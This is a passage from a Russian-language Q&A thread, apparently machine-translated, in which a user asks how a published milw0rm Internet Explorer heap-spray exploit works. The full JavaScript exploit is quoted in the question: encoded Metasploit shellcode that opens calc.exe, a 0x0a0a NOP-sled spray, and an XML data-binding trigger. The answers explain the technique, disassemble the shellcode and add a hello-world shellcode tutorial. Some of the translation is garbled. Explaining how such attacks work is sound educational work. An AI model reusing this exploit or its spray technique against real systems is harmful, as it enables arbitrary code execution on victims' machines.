Как работает этот эксплойт с кучи milw0rm?

Я обычно не испытываю затруднений при чтении кода JavaScript, но для этого я не могу понять логику. Код взят из эксплойта, который был опубликован 4 дня назад. Вы можете найти его на milw0rm.

Вот код:

<html>
    <div id="replace">x</div>
    <script>
        // windows/exec - 148 bytes
        // http://www.metasploit.com
        // Encoder: x86/shikata_ga_nai
        // EXITFUNC=process, CMD=calc.exe
        var shellcode = unescape("%uc92b%u1fb1%u0cbd%uc536%udb9b%ud9c5%u2474%u5af4%uea83%u31fc%u0b6a%u6a03%ud407%u6730%u5cff%u98bb%ud7ff%ua4fe%u9b74%uad05%u8b8b%u028d%ud893%ubccd%u35a2%u37b8%u4290%ua63a%u94e9%u9aa4%ud58d%ue5a3%u1f4c%ueb46%u4b8c%ud0ad%ua844%u524a%u3b81%ub80d%ud748%u4bd4%u6c46%u1392%u734a%u204f%uf86e%udc8e%ua207%u26b4%u04d4%ud084%uecba%u9782%u217c%ue8c0%uca8c%uf4a6%u4721%u0d2e%ua0b0%ucd2c%u00a8%ub05b%u43f4%u24e8%u7a9c%ubb85%u7dcb%ua07d%ued92%u09e1%u9631%u5580");

        // ugly heap spray, the d0nkey way!
        // works most of the time
        var spray = unescape("%u0a0a%u0a0a");

        do {
           spray += spray;
        } while(spray.length < 0xd0000);

        memory = new Array();

        for(i = 0; i < 100; i++)
           memory[i] = spray + shellcode;

        xmlcode = "<XML ID=I><X><C><![CDATA[<image SRC=http://&#x0a0a;&#x0a0a;.example.com>]]></C></X></XML><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML><XML ID=I></XML><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN></SPAN>";

        tag = document.getElementById("replace");
        tag.innerHTML = xmlcode;

    </script>
</html>

Вот то, во что я верю, и я хотел бы, чтобы вы помогли мне в той части, которую я неправильно понимаю.

Переменная shellcode содержит код для открытия calc.exe. Я не понимаю, как они нашли эту странную строку. Есть идеи?

Второе - это переменная spray. Я не понимаю эту странную петлю.

Третье - это переменная memory, которая никогда нигде не используется. Почему они это создают?

И последнее: что делает тег XML на странице?


На данный момент у меня есть хорошие ответы, но в основном очень общие. Я хотел бы больше объяснений значения кода. Примером является unescape("%u0a0a%u0a0a");. Что это значит? То же самое для цикла: почему разработчик написал: length < 0xd0000? Мне бы хотелось более глубокое понимание не только теории этого кода.

Ответ 1

Школьный код содержит некоторые инструкции сборки x86, которые будут выполнять фактический эксплойт. spray создает длинную последовательность инструкций, которые будут помещены в memory. Поскольку мы обычно не можем определить точное местоположение нашего шеллкода в памяти, мы ставим перед ним несколько инструкций nop и переходим туда. Массив memory будет содержать фактический код x86 вместе с механизмом перехода. Мы будем обрабатывать обработанный XML в библиотеке с ошибкой. При анализе ошибка приведет к тому, что регистр указателя команд будет назначен где-то в нашем эксплоите, что приведет к выполнению произвольного кода.

Чтобы глубже понять, вы должны на самом деле выяснить, что находится в коде x86. unscape будет использоваться, чтобы поместить последовательность байтов, представленных в строке в переменной spray. Он действительный код x86, который заполняет большой кусок кучи и переходит к началу shellcode. Причиной для условия окончания является ограничение длины строки для механизма сценариев. Вы не можете иметь строки больше определенной длины.

В сборке x86 0a0a представляет or cl, [edx]. Это эффективно эквивалентно инструкции nop для целей нашего использования. Куда бы мы ни прыгали в spray, мы перейдем к следующей инструкции, пока не достигнем шеллкода, который является кодом, который мы действительно хотим выполнить.

Если вы посмотрите на XML, вы увидите, что 0x0a0a тоже есть. Точно описывая, что происходит, требуется определенное знание эксплойта (вы должны знать, где ошибка и как она используется, чего я не знаю). Однако кажется, что мы заставляем Internet Explorer запускать код ошибки, устанавливая innerHtml на эту вредоносную строку XML. Internet Explorer пытается разобрать его, а багги-код каким-то образом управляет местоположением памяти, где существует массив (так как это большой кусок, вероятность прыжка там высока). Когда мы туда прыгаем, процессор будет продолжать выполнять инструкции or cl, [edx], пока не достигнет начала шеллкода, который помещается в память.

Я разобрал шеллкод:

00000000  C9                leave
00000001  2B1F              sub ebx,[edi]
00000003  B10C              mov cl,0xc
00000005  BDC536DB9B        mov ebp,0x9bdb36c5
0000000A  D9C5              fld st5
0000000C  2474              and al,0x74
0000000E  5A                pop edx
0000000F  F4                hlt
00000010  EA8331FC0B6A6A    jmp 0x6a6a:0xbfc3183
00000017  03D4              add edx,esp
00000019  07                pop es
0000001A  67305CFF          xor [si-0x1],bl
0000001E  98                cwde
0000001F  BBD7FFA4FE        mov ebx,0xfea4ffd7
00000024  9B                wait
00000025  74AD              jz 0xffffffd4
00000027  058B8B028D        add eax,0x8d028b8b
0000002C  D893BCCD35A2      fcom dword [ebx+0xa235cdbc]
00000032  37                aaa
00000033  B84290A63A        mov eax,0x3aa69042
00000038  94                xchg eax,esp
00000039  E99AA4D58D        jmp 0x8dd5a4d8
0000003E  E5A3              in eax,0xa3
00000040  1F                pop ds
00000041  4C                dec esp
00000042  EB46              jmp short 0x8a
00000044  4B                dec ebx
00000045  8CD0              mov eax,ss
00000047  AD                lodsd
00000048  A844              test al,0x44
0000004A  52                push edx
0000004B  4A                dec edx
0000004C  3B81B80DD748      cmp eax,[ecx+0x48d70db8]
00000052  4B                dec ebx
00000053  D46C              aam 0x6c
00000055  46                inc esi
00000056  1392734A204F      adc edx,[edx+0x4f204a73]
0000005C  F8                clc
0000005D  6E                outsb
0000005E  DC8EA20726B4      fmul qword [esi+0xb42607a2]
00000064  04D4              add al,0xd4
00000066  D084ECBA978221    rol byte [esp+ebp*8+0x218297ba],1
0000006D  7CE8              jl 0x57
0000006F  C0CA8C            ror dl,0x8c
00000072  F4                hlt
00000073  A6                cmpsb
00000074  47                inc edi
00000075  210D2EA0B0CD      and [0xcdb0a02e],ecx
0000007B  2CA8              sub al,0xa8
0000007D  B05B              mov al,0x5b
0000007F  43                inc ebx
00000080  F4                hlt
00000081  24E8              and al,0xe8
00000083  7A9C              jpe 0x21
00000085  BB857DCBA0        mov ebx,0xa0cb7d85
0000008A  7DED              jnl 0x79
0000008C  92                xchg eax,edx
0000008D  09E1              or ecx,esp
0000008F  96                xchg eax,esi
00000090  315580            xor [ebp-0x80],edx

Для понимания этого shell-кода требуется знание ассемблера x86 и проблема в самой библиотеке MS (чтобы узнать, что такое состояние системы, когда мы достигаем здесь), а не JavaScript! Этот код, в свою очередь, выполнит calc.exe.

Ответ 3

Это похоже на эксплойт недавней ошибки Internet Explorer, в которой Microsoft выпустила аварийный патч для. Он использует недостаток в функции привязки данных обработчика XML XML, что приводит к неправильной выгрузке памяти кучи.

Шеллкод - это машинный код, который будет запускаться при возникновении ошибки. Распыление и память - это просто какое-то пространство, выделенное в куче, чтобы справиться с эксплуатационным условием.

Ответ 5

Всякий раз, когда я вижу память, которая не рассматривается в обсуждении эксплойтов, моя первая мысль заключается в том, что эксплойт - это своего рода переполнение буфера, и в этом случае память либо вызывает переполнение буфера, либо обращается к нему один раз переполнение буфера.

Ответ 6

Это из metasploit, это означает, что он использует один из метаслоированных кодов оболочки. Это с открытым исходным кодом, поэтому вы можете пойти и захватить его: http://www.metasploit.com/

Ответ 7

Для получения дополнительной информации об этой уязвимости я бы предложил прочитать MS08-078 и SDL.

Ответ 9

Простой пример шеллкода

Привет, мир в сборке. Синтаксис & t x86, я верю (Мастер в обучении).

настроить файл: vim shellcodeExample.s

.text           #required
.goblal _start  #required

_start:         #main function
 jmp one        #jump to the section labeled one:

two:
 pop  %rcx         #pop %rcx off the stack, or something
 xor  %rax, %rax   #Clear
 movl 4, %rax      #use sys_write(printf || std::cout)
 xor  %rbx, %rbx   #Clear
 inc  %rbx         #increment %rbx to 1 stdout(terminal)
 xor  %rdx, %rdx   #Clear Registers or something
 movb $13, %dl     #String Size
 int  $0x80

one:
 call two                   #jump up to section two:
 .ascii "Hello World\r\n"   #make the string one of the starting memory 
                            #^-addresses

скомпилировать так: as -o shellcodeExample.o shellcodeExample.s; ld -s -o shellcode shellcodeExample.o as -o shellcodeExample.o shellcodeExample.s; ld -s -o shellcode shellcodeExample.o

Теперь у вас есть двоичный файл, который печатает привет мир. преобразовать двоичный код в тип шелл-кода в: objdump -D shellcode

вы получите вывод:

shellcode:     file format elf64-x86-64


Disassembly of section .text:

0000000000400078 <.text>:
  400078:   eb 1a                   jmp    0x400094
  40007a:   59                      pop    %rcx
  40007b:   48 31 c0                xor    %rax,%rax
  40007e:   b0 04                   mov    $0x4,%al
  400080:   48 31 db                xor    %rbx,%rbx
  400083:   48 ff c3                inc    %rbx
  400086:   48 31 d2                xor    %rdx,%rdx
  400089:   b2 0d                   mov    $0xd,%dl
  40008b:   cd 80                   int    $0x80
  40008d:   b0 01                   mov    $0x1,%al
  40008f:   48 ff cb                dec    %rbx
  400092:   cd 80                   int    $0x80
  400094:   e8 e1 ff ff ff          callq  0x40007a
  400099:   68 65 6c 6c 6f          pushq  $0x6f6c6c65
  40009e:   20 77 6f                and    %dh,0x6f(%rdi)
  4000a1:   72 6c                   jb     0x40010f
  4000a3:   64                      fs
  4000a4:   0d                      .byte 0xd
  4000a5:   0a                      .byte 0xa

Теперь, если вы посмотрите на 4-ю строку с текстом, вы увидите: 400078: eb 1a jmp 0x400094

часть, которая говорит eb 1a является шестнадцатеричным представлением инструкции по сборке jmp one где "one" - это адрес памяти вашей строки.

чтобы подготовить свой шеллкод к выполнению, откройте другой текстовый файл и сохраните шестнадцатеричные значения в массиве символов. Для правильного форматирования кода оболочки вы вводите \x перед каждым шестнадцатеричным значением.

следующий пример кода оболочки будет выглядеть следующим образом в соответствии с выводом команды objdump:

unsigned char PAYLOAD[] = 
"\xeb\x1a\x59\x48\x31\xc0\xb0\x04\x48\x31\xdb\x48\xff\xc3\x48\x31\xd2\xb2\xd0\xcd\x80\xb0\x01\x48\xff\xcb\xcd\x80\xe8\xe1\xff\xff\xff\x68\x65\x6c\x6c\x6f\x20\x77\x6f\x72\x6c\x64\x0d\x0a";

Этот пример использует C для массива. Теперь у вас есть рабочий шелл-код, который будет записывать в стандартный вывод "hello world"

Вы можете протестировать код оболочки, поместив его в уязвимость, или вы можете написать следующую программу c для его проверки:

vim execShellcode.cc; //linux command to create c file.

/*Below is the content of execShellcode.cc*/
unsigned char PAYLOAD[] = 
"\xeb\x1a\x59\x48\x31\xc0\xb0\x04\x48\x31\xdb\x48\xff\xc3\x48\x31\xd2\xb2\xd0\xcd\x80\xb0\x01\x48\xff\xcb\xcd\x80\xe8\xe1\xff\xff\xff\x68\x65\x6c\x6c\x6f\x20\x77\x6f\x72\x6c\x64\x0d\x0a";

int main(){
    ((void(*)(void))PAYLOAD)();
    return 0;
}

Для компиляции программы введите:

gcc -fno-stack-protector -z execstack execShellcode.cc -o run

работать с ./run У вас есть рабочий пример простой разработки ./run который был протестирован в linux mint/debian.